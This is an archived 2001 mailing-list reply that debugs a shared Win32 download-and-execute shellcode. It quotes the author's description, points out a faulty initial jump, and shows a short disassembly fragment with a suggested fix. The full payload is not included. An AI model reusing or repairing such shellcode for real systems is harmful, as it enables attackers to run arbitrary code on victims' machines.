>I send a generic win32 shellcode in attachment. It has a size of 800 bytes
>and has an editable URL line. It must point to an exe on the internet.
>Shellcode will download it and execute. It runs in Windows
>95/98/ME/NT/2000 and XP. The file to download has a limit of 2.2 Mb. If
>someone can test shellcode please send me an email to comment on it.

Why do you have a relative jump to [ShellCode-Entry] - 7 Bytes at the
beginning of your code?
(the first jump should be EIP+11 bytes: \xEB\x0B\x...)

Debug: (added 4 nops; entry: 00401000)

  00401003 90                   nop
  00401004 EB F7                jmp         00400FFD    ;???
  00401006 8D 76 17             lea         esi,[esi+17h]
  00401009 8B FC                mov         edi,esp
  0040100B 8B D7                mov         edx,edi
  0040100D F3 A4                rep movs    byte ptr [edi],byte ptr [esi]
  0040100F 52                   push        edx
  00401010 C3                   ret
  00401011 EB 30                jmp         00401043    ;eip should jump to this address
  ;00401228 E8 E6 FD FF FF      call        00401013
=>00401013 5F                   pop         edi
  ...

Der HexXer.

This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 08:17:49 PDT